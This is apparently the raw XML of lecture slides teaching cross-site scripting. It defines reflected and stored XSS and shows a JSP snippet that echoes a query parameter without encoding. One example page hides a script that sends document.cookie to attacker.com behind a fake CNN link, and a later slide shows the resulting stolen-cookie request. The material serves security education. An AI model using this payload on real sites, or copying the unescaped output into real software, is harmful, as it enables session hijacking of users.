          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. </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Amazingly Common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>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Execute script in the victim’s browser which can hijack user sessions, deface web sites, possibly introduce worms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>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10</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41280939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Categories of XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3733800"/>
            <a:ext cx="8382000" cy="2590800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	Attacker embed JS Link in your Website and ask your users to follow it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stored/Persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	Attacker get  his/her XSS in to your site’s database somehow so that it shows up on your pages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Diagram 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2514600" y="762000"/>
          <a:ext cx="4343400" cy="292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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</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9224020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Reflected XSS Works</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1981200"/>
            <a:ext cx="7315200" cy="3200400"/>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12</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36286578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Reflected Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8458200" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Easiest to exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a page will reflect user supplied data directly back to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In an JSP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">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&lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(“query”);%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML (Output Page) returns the search phrase invalidated to the user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>out.writeln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(“You searched for: “+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(“query”);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3143250" y="2209800"/>
            <a:ext cx="4857750" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13</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254064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Reflected XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5181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&lt;html&gt;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&lt;head&gt;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&lt;title&gt;Look at this!&lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a: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="http://xyz.com/webmonkey/00/18/index3a_page2.html?tw</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=&lt;script&gt;document.location.replace('http://attacker.com/steal.cgi?'+</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>onMouseOver</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>window.status</a:t>
            </a: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='http://www.cnn.com/2002/SHOWBIZ/News/05/02/clinton.talkshow.reut/index.html';return true"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>onMouseOut</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>window.status</a:t>
            </a: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='';return true"&gt; Check this CNN story out!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&lt;/a&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="5334000"/>
            <a:ext cx="2295525" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>14</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9723693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Reflected XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Actual redirect request looks like the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286</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15</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90271376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XSS Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1541463" y="2085975"/>
            <a:ext cx="920750" cy="1050925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226050" y="2230438"/>
            <a:ext cx="2668588" cy="1427162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1219200"/>
            <a:ext cx="4114800" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="1600" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacking trust relationships</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2436813" y="2379663"/>
            <a:ext cx="3306762" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1828800" y="3352800"/>
            <a:ext cx="0" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="3810000"/>
            <a:ext cx="941388" cy="879475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2489200" y="3190875"/>
            <a:ext cx="3233738" cy="792163"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
